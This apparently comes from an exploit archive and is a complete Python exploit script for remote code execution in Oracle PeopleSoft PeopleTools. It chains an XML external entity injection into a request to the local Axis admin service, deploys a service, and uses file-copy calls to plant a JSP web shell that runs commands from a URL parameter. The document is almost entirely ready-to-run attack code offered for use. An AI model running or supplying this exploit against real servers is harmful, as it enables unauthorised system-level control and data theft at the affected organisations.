Oracle PeopleSoft Enterprise PeopleTools Remote Code Execution
Posted on 04 November 2017
#!/usr/bin/python3 # Oracle PeopleSoft SYSTEM RCE # https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce # cf # 2017-05-17 import requests import urllib.parse import re import string import random import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) try: import colorama except ImportError: colorama = None else: colorama.init() COLORS = { '+': colorama.Fore.GREEN, '-': colorama.Fore.RED, ':': colorama.Fore.BLUE, '!': colorama.Fore.YELLOW } URL = sys.argv[1].rstrip('/') CLASS_NAME = 'org.apache.pluto.portalImpl.Deploy' PROXY = 'localhost:8080' # shell.jsp?c=whoami PAYLOAD = '<%@ page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>' class Browser: """Wrapper around requests. """ def __init__(self, url): self.url = url self.init() def init(self): self.session = requests.Session() self.session.proxies = { 'http': PROXY, 'https': PROXY } self.session.verify = False def get(self, url ,*args, **kwargs): return self.session.get(url=self.url + url, *args, **kwargs) def post(self, url, *args, **kwargs): return self.session.post(url=self.url + url, *args, **kwargs) def matches(self, r, regex): return re.findall(regex, r.text) class Recon(Browser): """Grabs different informations about the target. """ def check_all(self): self.site_id = None self.local_port = None self.check_version() self.check_site_id() self.check_local_infos() def check_version(self): """Grabs PeopleTools' version. """ self.version = None r = self.get('/PSEMHUB/hub') m = self.matches(r, 'Registered Hosts Summary - ([0-9.]+).</b>') if m: self.version = m[0] o(':', 'PTools version: %s' % self.version) else: o('-', 'Unable to find version') def check_site_id(self): """Grabs the site ID and the local port. """ if self.site_id: return r = self.get('/') m = self.matches(r, '/([^/]+)/signon.html') if not m: raise RuntimeError('Unable to find site ID') self.site_id = m[0] o('+', 'Site ID: ' + self.site_id) def check_local_infos(self): """Uses cookies to leak hostname and local port. """ if self.local_port: return r = self.get('/psp/%s/signon.html' % self.site_id) for c, v in self.session.cookies.items(): if c.endswith('-PORTAL-PSJSESSIONID'): self.local_host, self.local_port, *_ = c.split('-') o('+', 'Target: %s:%s' % (self.local_host, self.local_port)) return raise RuntimeError('Unable to get local hostname / port') class AxisDeploy(Recon): """Uses the XXE to install Deploy, and uses its two useful methods to get a shell. """ def init(self): super().init() self.service_name = 'YZWXOUuHhildsVmHwIKdZbDCNmRHznXR' #self.random_string(10) def random_string(self, size): return ''.join(random.choice(string.ascii_letters) for _ in range(size)) def url_service(self, payload): return 'http://localhost:%s/pspc/services/AdminService?method=%s' % ( self.local_port, urllib.parse.quote_plus(self.psoap(payload)) ) def war_path(self, name): # This is just a guess from the few PeopleSoft instances we audited. # It might be wrong. suffix = '.war' if self.version and self.version >= '8.50' else '' return './applications/peoplesoft/%s%s' % (name, suffix) def pxml(self, payload): """Converts an XML payload into a one-liner. """ payload = payload.strip().replace(' ', ' ') payload = re.sub('s+<', '<', payload, flags=re.S) payload = re.sub('s+', ' ', payload, flags=re.S) return payload def psoap(self, payload): """Converts a SOAP payload into a one-liner, including the comment trick to allow attributes. """ payload = self.pxml(payload) payload = '!-->%s' % payload[:-1] return payload def soap_service_deploy(self): """SOAP payload to deploy the service. """ return """ <ns1:deployment xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java" xmlns:ns1="http://xml.apache.org/axis/wsdd/"> <ns1:service name="%s" provider="java:RPC"> <ns1:parameter name="className" value="%s"/> <ns1:parameter name="allowedMethods" value="*"/> </ns1:service> </ns1:deployment> """ % (self.service_name, CLASS_NAME) def soap_service_undeploy(self): """SOAP payload to undeploy the service. """ return """ <ns1:undeployment xmlns="http://xml.apache.org/axis/wsdd/" xmlns:ns1="http://xml.apache.org/axis/wsdd/"> <ns1:service name="%s"/> </ns1:undeployment> """ % (self.service_name, ) def xxe_ssrf(self, payload): """Runs the given AXIS deploy/undeploy payload through the XXE. """ data = """ <?xml version="1.0"?> <!DOCTYPE IBRequest [ <!ENTITY x SYSTEM "%s"> ]> <IBRequest> <ExternalOperationName>&x;</ExternalOperationName> <OperationType/> <From><RequestingNode/> <Password/> <OrigUser/> <OrigNode/> <OrigProcess/> <OrigTimeStamp/> </From> <To> <FinalDestination/> <DestinationNode/> <SubChannel/> </To> <ContentSections> <ContentSection> <NonRepudiation/> <MessageVersion/> <Data> </Data> </ContentSection> </ContentSections> </IBRequest> """ % self.url_service(payload) r = self.post( '/PSIGW/HttpListeningConnector', data=self.pxml(data), headers={ 'Content-Type': 'application/xml' } ) def service_check(self): """Verifies that the service is correctly installed. """ r = self.get('/pspc/services') return self.service_name in r.text def service_deploy(self): self.xxe_ssrf(self.soap_service_deploy()) if not self.service_check(): raise RuntimeError('Unable to deploy service') o('+', 'Service deployed') def service_undeploy(self): if not self.local_port: return self.xxe_ssrf(self.soap_service_undeploy()) if self.service_check(): o('-', 'Unable to undeploy service') return o('+', 'Service undeployed') def service_send(self, data): """Send data to the Axis endpoint. """ return self.post( '/pspc/services/%s' % self.service_name, data=data, headers={ 'SOAPAction': 'useless', 'Content-Type': 'application/xml' } ) def service_copy(self, path0, path1): """Copies one file to another. """ data = """ <?xml version="1.0" encoding="utf-8"?> <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:api="http://127.0.0.1/Integrics/Enswitch/API" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Body> <api:copy soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <in0 xsi:type="xsd:string">%s</in0> <in1 xsi:type="xsd:string">%s</in1> </api:copy> </soapenv:Body> </soapenv:Envelope> """.strip() % (path0, path1) response = self.service_send(data) return '<ns1:copyResponse' in response.text def service_main(self, tmp_path, tmp_dir): """Writes the payload at the end of the .xml file. """ data = """ <?xml version="1.0" encoding="utf-8"?> <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:api="http://127.0.0.1/Integrics/Enswitch/API" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Body> <api:main soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <api:in0> <item xsi:type="xsd:string">%s</item> <item xsi:type="xsd:string">%s</item> <item xsi:type="xsd:string">%s.war</item> <item xsi:type="xsd:string">something</item> <item xsi:type="xsd:string">-addToEntityReg</item> <item xsi:type="xsd:string"><![CDATA[%s]]></item> </api:in0> </api:main> </soapenv:Body> </soapenv:Envelope> """.strip() % (tmp_path, tmp_dir, tmp_dir, PAYLOAD) response = self.service_send(data) def build_shell(self): """Builds a SYSTEM shell. """ # On versions >= 8.50, using another extension than JSP got 70 bytes # in return every time, for some reason. # Using .jsp seems to trigger caching, thus the same pivot cannot be # used to extract several files. # Again, this is just from experience, nothing confirmed pivot = '/%s.jsp' % self.random_string(20) pivot_path = self.war_path('PSOL') + pivot pivot_url = '/PSOL' + pivot # 1: Copy portletentityregistry.xml to TMP per = '/WEB-INF/data/portletentityregistry.xml' per_path = self.war_path('pspc') tmp_path = '../' * 20 + 'TEMP' tmp_dir = self.random_string(20) tmp_per = tmp_path + '/' + tmp_dir + per if not self.service_copy(per_path + per, tmp_per): raise RuntimeError('Unable to copy original XML file') # 2: Add JSP payload self.service_main(tmp_path, tmp_dir) # 3: Copy XML to JSP in webroot if not self.service_copy(tmp_per, pivot_path): raise RuntimeError('Unable to copy modified XML file') response = self.get(pivot_url) if response.status_code != 200: raise RuntimeError('Unable to access JSP shell') o('+', 'Shell URL: ' + self.url + pivot_url) class PeopleSoftRCE(AxisDeploy): def __init__(self, url): super().__init__(url) def o(s, message): if colorama: c = COLORS[s] s = colorama.Style.BRIGHT + COLORS[s] + '|' + colorama.Style.RESET_ALL print('%s %s' % (s, message)) x = PeopleSoftRCE(URL) try: x.check_all() x.service_deploy() x.build_shell() except RuntimeError as e: o('-', e) finally: x.service_undeploy()